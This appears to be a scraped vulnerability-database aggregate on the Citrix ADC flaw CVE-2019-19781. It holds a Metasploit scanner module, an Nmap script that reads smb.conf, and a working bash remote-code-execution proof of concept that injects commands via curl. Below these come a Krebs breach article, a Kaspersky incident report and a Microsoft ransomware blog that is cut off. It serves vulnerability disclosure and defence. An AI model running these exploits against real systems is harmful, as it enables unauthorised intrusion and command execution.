https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC (NetScaler) Directory Traversal Scanner',\n 'Description' => %{\n This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC\n (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request\n /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of\n a \"[global]\" directive in smb.conf, which this file should always contain.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'Erik Wynter', # Module (@wyntererik)\n 'altonjx' # Module (@altonjx)\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['URL', 'https://support.citrix.com/article/CTX267027/'],\n ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Notes' => {\n 'AKA' => ['Shitrix']\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('PATH', [true, 'Traversal path', '/vpn/../vpns/cfg/smb.conf'])\n ])\n end\n\n def run_host(target_host)\n turi = normalize_uri(target_uri.path, datastore['PATH'])\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => turi\n )\n\n unless res\n print_error(\"#{full_uri(turi)} - No response, target seems down.\")\n\n return Exploit::CheckCode::Unknown\n end\n\n unless res.code == 200\n print_error(\"#{full_uri(turi)} - The target is not vulnerable to CVE-2019-19781.\")\n vprint_error(\"Obtained HTTP response code #{res.code} for #{full_uri(turi)}.\")\n\n return Exploit::CheckCode::Safe\n end\n\n if turi.end_with?('smb.conf')\n unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.match(/\\[\\s*global\\s*\\]/)\n vprint_warning(\"#{turi} does not contain \\\"[global]\\\" directive.\")\n end\n end\n\n print_good(\"#{full_uri(turi)} - The target is vulnerable to CVE-2019-19781.\")\n msg = \"Obtained HTTP response code #{res.code} for #{full_uri(turi)}. \" \\\n \"This means that access to #{turi} was obtained via directory traversal.\"\n vprint_good(msg)\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references,\n info: msg\n )\n\n Exploit::CheckCode::Vulnerable\n end\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/citrix_dir_traversal.rb"}], "exploitdb": [{"lastseen": "2020-01-16T11:26:41", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-16T00:00:00", "published": "2020-01-16T00:00:00", "id": "EDB-ID:47930", "href": "https://www.exploit-db.com/exploits/47930", "type": "exploitdb", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\r\n# Date: 2019-12-17\r\n# CVE: CVE-2019-19781\r\n# Vulenrability: Path Traversal\r\n# Vulnerablity Discovery: Mikhail Klyuchnikov\r\n# Exploit Author: Dhiraj Mishra\r\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\r\n# Vendor Homepage: https://www.citrix.com/\r\n# References: https://support.citrix.com/article/CTX267027\r\n# https://github.com/nmap/nmap/pull/1893\r\n\r\nlocal http = require \"http\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal shortport = require \"shortport\"\r\nlocal table = require \"table\"\r\nlocal string = require \"string\"\r\nlocal vulns = require \"vulns\"\r\nlocal nmap = require \"nmap\"\r\nlocal io = require \"io\"\r\n\r\ndescription = [[\r\nThis NSE script checks whether the traget server is vulnerable to\r\nCVE-2019-19781\r\n]]\r\n---\r\n-- @usage\r\n-- nmap --script https-citrix-path-traversal -p <port> <host>\r\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\r\noutput='file.txt'\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 443/tcp open http\r\n-- | CVE-2019-19781:\r\n-- | Host is vulnerable to CVE-2019-19781\r\n-- @changelog\r\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\r\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\r\n-- @xmloutput\r\n-- <table key=\"NMAP-1\">\r\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\r\n-- <elem key=\"state\">VULNERABLE</elem>\r\n-- <table key=\"description\">\r\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\r\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\r\n-- traversal vulnerability that allows attackers to read configurations or\r\nany other file.\r\n-- </table>\r\n-- <table key=\"dates\">\r\n-- <table key=\"disclosure\">\r\n-- <elem key=\"year\">2019</elem>\r\n-- <elem key=\"day\">17</elem>\r\n-- <elem key=\"month\">12</elem>\r\n-- </table>\r\n-- </table>\r\n-- <elem key=\"disclosure\">17-12-2019</elem>\r\n-- <table key=\"extra_info\">\r\n-- </table>\r\n-- <table key=\"refs\">\r\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\r\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\r\n-- </table>\r\n-- </table>\r\n\r\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\r\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\r\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\r\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\r\n\r\nportrule = shortport.ssl\r\n\r\naction = function(host,port)\r\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\r\n local vuln = {\r\n title = 'Citrix ADC Path Traversal',\r\n state = vulns.STATE.NOT_VULN,\r\n description = [[\r\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\r\n12.1, and 13.0 are vulnerable\r\nto a unauthenticated path traversal vulnerability that allows attackers to\r\nread configurations or any other file.\r\n ]],\r\n references = {\r\n 'https://support.citrix.com/article/CTX267027',\r\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\r\n },\r\n dates = {\r\n disclosure = {year = '2019', month = '12', day = '17'},\r\n },\r\n }\r\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\r\n local path = \"/vpn/../vpns/cfg/smb.conf\"\r\n local response\r\n local output = {}\r\n local success = \"Host is vulnerable to CVE-2019-19781\"\r\n local fail = \"Host is not vulnerable\"\r\n local match = \"[global]\"\r\n local credentials\r\n local citrixADC\r\n response = http.get(host, port.number, path)\r\n\r\n if not response.status then\r\n stdnse.print_debug(\"Request Failed\")\r\n return\r\n end\r\n if response.status == 200 then\r\n if string.match(response.body, match) then\r\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\r\nSCRIPT_NAME,host.targetname or host.ip, path)\r\n vuln.state = vulns.STATE.VULN\r\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\r\nor host.ip,port.number, path))\r\n if outputFile then\r\n credentials = response.body:gsub('%W','.')\r\nvuln.check_results = stdnse.format_output(true, citrixADC)\r\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\r\nstored in the output file\")\r\nfile = io.open(outputFile, \"a\")\r\nfile:write(credentials, \"\\n\")\r\n else\r\n vuln.check_results = stdnse.format_output(true, citrixADC)\r\n end\r\n end\r\n elseif response.status == 403 then\r\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\r\nor host.ip, path, response.status)\r\n vuln.state = vulns.STATE.NOT_VULN\r\n end\r\n\r\n return vuln_report:make_output(vuln)\r\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/47930"}, {"lastseen": "2020-01-11T01:26:19", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-11T00:00:00", "published": "2020-01-11T00:00:00", "id": "EDB-ID:47901", "href": "https://www.exploit-db.com/exploits/47901", "type": "exploitdb", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "sourceData": "#!/bin/bash\r\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\r\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\r\n# Release Date : 11/01/2020\r\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\r\necho \"=================================================================================\r\n ___ _ _ ____ ___ _ _\r\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\r\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\r\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\r\n |__/ CVE-2019-19781\r\n=================================================================================\"\r\n##############################\r\nif [ -z \"$1\" ];\r\nthen\r\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\r\nexit;\r\nfi\r\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\r\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\r\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\r\necho -ne \"Command Output :\\n\"\r\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/47901"}], "krebs": [{"lastseen": "2020-02-19T23:32:25", "bulletinFamily": "blog", "description": "Networking software giant **Citrix Systems** says malicious hackers were inside its networks for five months between 2018 and 2019, making off with personal and financial data on company employees, contractors, interns, job candidates and their dependents. The disclosure comes almost a year after Citrix acknowledged that digital intruders had broken in by probing its employee accounts for weak passwords.\n\n[](<https://krebsonsecurity.com/wp-content/uploads/2020/02/citrix-notice.png>)\n\nCitrix provides software used by hundreds of thousands of clients worldwide, including most of the Fortune 100 companies. It is perhaps best known for selling virtual private networking (VPN) software that lets users remotely access networks and computers over an encrypted connection.\n\nIn March 2019, the **Federal Bureau of Investigation** (FBI) alerted Citrix they had reason to believe cybercriminals had gained access to the company's internal network. The FBI told Citrix the hackers likely got in using a technique called \"[password spraying](<https://resources.infosecinstitute.com/password-spraying/>),\" a relatively crude but remarkably effective attack that attempts to access a large number of employee accounts (usernames/email addresses) using just a handful of common passwords.\n\nIn [a statement](<https://www.citrix.com/blogs/2019/03/08/citrix-investigating-unauthorized-access-to-internal-network/>) released at the time, Citrix said it appeared hackers \"may have accessed and downloaded business documents,\" and that it was still working to identify what precisely was accessed or stolen.\n\nBut in a letter sent to affected individuals dated Feb. 10, 2020, Citrix disclosed additional details about the incident. According to the letter, the attackers \"had intermittent access\" to Citrix's internal network between Oct. 13, 2018 and Mar. 8, 2019, and that there was no evidence that the cybercrooks still remain in the company's systems.\n\nCitrix said the information taken by the intruders may have included Social Security Numbers or other tax identification numbers, driver's license numbers, passport numbers, financial account numbers, payment card numbers, and/or limited health claims information, such as health insurance participant identification number and/or claims information relating to date of service and provider name.\n\nIt is unclear how many people received this letter, but the communication suggests Citrix is contacting a broad range of individuals who work or worked for the company at some point, as well as those who applied for jobs or internships there and people who may have received health or other benefits from the company by virtue of having a family member employed by the company.\n\nCitrix's letter was prompted by laws in virtually all U.S. states that require companies to notify affected consumers of any incident that jeopardizes their personal and financial data. While the notification does not specify whether the attackers stole proprietary data about the company's software and internal operations, the intruders certainly had ample opportunity to access at least some of that information as well.\n\nShortly after Citrix initially disclosed the intrusion in March 2019, a little-known security company **Resecurity** [claimed](<https://web.archive.org/web/20190313082751/https://resecurity.com/blog/supply-chain-the-major-target-of-cyberespionage-groups/>) it had evidence Iranian hackers were responsible, had been in Citrix\u2019s network for years, and had offloaded terabytes of data. Resecurity also presented evidence that it notified Citrix of the breach as early as Dec. 28, 2018, a claim Citrix initially denied but later acknowledged.\n\nIranian hackers recently have been blamed for hacking VPN servers around the world in a bid to plant backdoors in large corporate networks. A [report released this week](<https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf>) (PDF) by security firm **ClearSky** details how Iran's government-backed hacking units have been busy exploiting security holes in popular VPN products from Citrix and a number of other software firms.\n\nClearSky says the attackers have focused on attacking VPN tools because they provide a long-lasting foothold at the targeted organizations, and frequently open the door to breaching additional companies through supply-chain attacks. The company says such tactics have allowed the Iranian hackers to gain persistent access to the networks of companies across a broad range of sectors, including IT, security, telecommunications, oil and gas, aviation, and government.\n\nAmong the VPN flaws available to attackers is a recently-patched vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) in Citrix VPN servers dubbed \"Shitrix\" by some in the security community. The derisive nickname may have been chosen because while Citrix [initially warned customers about the vulnerability in mid-December 2019](<https://support.citrix.com/article/CTX267027>), it didn't start releasing patches to plug the holes until late January 2020 -- roughly two weeks after attackers started using [publicly released exploit code](<https://www.zdnet.com/article/proof-of-concept-code-published-for-citrix-bug-as-attacks-intensify/>) to break into vulnerable organizations.\n\nHow would your organization hold up to a password spraying attack? As the Citrix hack shows, if you don\u2019t know you should probably check, and then act on the results accordingly. It's a fair bet the bad guys are going to find out even if you don\u2019t.", "modified": "2020-02-19T15:55:04", "published": "2020-02-19T15:55:04", "id": "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "href": "https://krebsonsecurity.com/2020/02/hackers-were-inside-citrix-for-five-months/", "type": "krebs", "title": "Hackers Were Inside Citrix for Five Months", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "description": "\n\n[ Download full report (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/06094905/Kaspersky_Incident-Response-Analyst_2020.pdf>)\n\nAs an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries&#x27; cyber-incident tactics and techniques used in the wild. In this report, we share our teams&#x27; conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.\n\nThe insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.\n\n## Executive summary\n\nIn 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.\n\nAnalysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.\n\nMost of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware&#x27;s presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png>)\n\n### \n\n### Verticals and industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png>)\n\nAdversaries used a variety of initial vectors to compromise victims&#x27; environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110209/sl_incident_response_03.png>)\n\nIn addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.\n\nAlthough we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.\n\n## Recommendations\n\nBased on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:\n\n * Apply complex password policies\n * Avoid management interfaces exposed to the internet\n * Only allow remote access for necessary external services with multi-factor authentication \u2013 with necessary privileges only\n * Regular system audits to identify vulnerable services and misconfigurations\n * Continually tune security tools to avoid false positives\n * Apply powerful audit policy with log retention period of at least six months\n * Monitor and investigate all alerts generated by security tools\n * Patch your publicly available services immediately\n * Enhance your email protection and employee awareness\n * Forbid use of PsExec to simplify security operations\n * Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks\n * Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss\n * Back up your data frequently and on separated infrastructure\n\n \n\n## Reasons for incident response\n\nSignificant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110347/sl_incident_response_04.png>)\n\nOrganizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110436/sl_incident_response_05.png>)\n\nOne of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story &quot;[Cities under ransomware siege](<https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/>)&quot;.\n\n \n\n## Distribution of reasons for top regions\n\nA suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110519/sl_incident_response_06.png>)\n\n## Distribution of reasons for industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110612/sl_incident_response_07.png>)\n\nAlthough, different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).\n\nDetection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.\n\n## Initial vectors or how adversaries get in\n\nCommon initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110706/sl_incident_response_08.png>)\n\nBy linking the popular initial compromise vectors with how an incident was detected, we can see detected suspicious files were detected from malicious emails. And cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks. \nSometimes we act as complimentary experts for a primary incident response team from the victim&#x27;s organization and we have no information on all of their findings \u2013 hence the &#x27;Unknown reasons&#x27; on the charts. Malicious emails are most likely to be detected by a variety of security toolstack, but that&#x27;s not showing distrubution of 0- to 1-day vulnerabilities.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110805/sl_incident_response_09.png>)\n\nThe distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that begin with vulnerability exploitation on an organization&#x27;s network perimeter went unnoticed for longest. Social enginnering attacks via email were the most short-lived.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110857/sl_incident_response_10.png>)\n\n## Tools and exploits\n\n### 30% of all incidents were tied to legitimate tools\n\nIn cyberattacks, adversaries use legitimate tools which can&#x27;t be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110943/sl_incident_response_11.png>)\n\nMost legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. PowerShell can be used virtually for any task.\n\nLet&#x27;s weight those tools based on occurrence in incidents \u2013 we will also see tactics (MITRE ATT&amp;CK) where they are usually applied.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111024/sl_incident_response_12.png>)\n\n### Exploits\n\nMost of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.\n\n**MS17-010** _SMB service in Microsoft Windows_ \nRemote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc. | **CVE-2019-0604** _Microsoft Sharepoint_ \nRemote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint. | **CVE-2019-19781** _Citrix Application Delivery Controller &amp; Citrix Gateway_ \nThis vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure. \n---|---|--- \n**CVE-2019-0708** _RDP service in Microsoft Windows_ \nRemote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service. | **CVE-2018-7600** _Drupal_ \nRemote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers. | **CVE-2019-11510** _Pulse Secure SSL VPN_ \nUnauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel. \n \n## Attack duration\n\nFor a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary&#x27;s activity and the end of the attack. As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.\n\n**Rush hours or days** | **Average weeks** | **Long-lasting months or longer** \n---|---|--- \nThis category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods. \nIn some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary&#x27;s activity. | This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week. | Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data. \nSuch attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group. \n**Common threat:** \nRansomware infection | **Common threat:** \nFinancial theft | **Common threat:** \nCyber-espionage and theft of confidential data \n**Common attack vector:**\n\n * Downloading of a malicious file by link in email\n * Downloading of a malicious file from infected site\n * Exploitation of vulnerabilities on network perimeter\n * Credentials brute-force attack\n| **Common attack vector:**\n\n * Downloading a malicious file by link in email\n * Exploitation of vulnerabilities on network perimeter\n| **Common attack vector:**\n\n * Exploitation of vulnerabilities on network perimeter \n**Attack duration (median):** \n1 day | **Attack duration (median):** \n10 days | **Attack duration (median):** \n122 days \n**Incident response duration:** \nHours to days | **Incident response duration:** \nWeeks | **Incident response duration:** \nWeeks \n \n## Operational metrics\n\n### False positives rate\n\nFalse positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn&#x27;t have a specialist in threat hunting or they are managed by an external SOC that doesn&#x27;t have the full context for an event.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111207/sl_incident_response_13.png>)\n\n### Age of attack\n\nThis is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111254/sl_incident_response_14.png>)\n\n## How fast we responded\n\nHow long it took us to respond after an organization contacted us. 70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111342/sl_incident_response_15.png>)\n\n## How long response took\n\nDistribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111429/sl_incident_response_16.png>)\n\n## **MITRE ATT&amp;CK tactics and techniques**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111538/sl_incident_response_17.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111649/sl_incident_response_18.png>)\n\n## Conclusion\n\nIn 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.\n\nImproved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.\n\nVarious tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.\n\nAdversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.\n\nApplying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.", "modified": "2020-08-06T10:00:34", "published": "2020-08-06T10:00:34", "id": "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "href": "https://securelist.com/incident-response-analyst-report-2019/97974/", "type": "securelist", "title": "Incident Response Analyst Report 2019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "bulletinFamily": "blog", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication 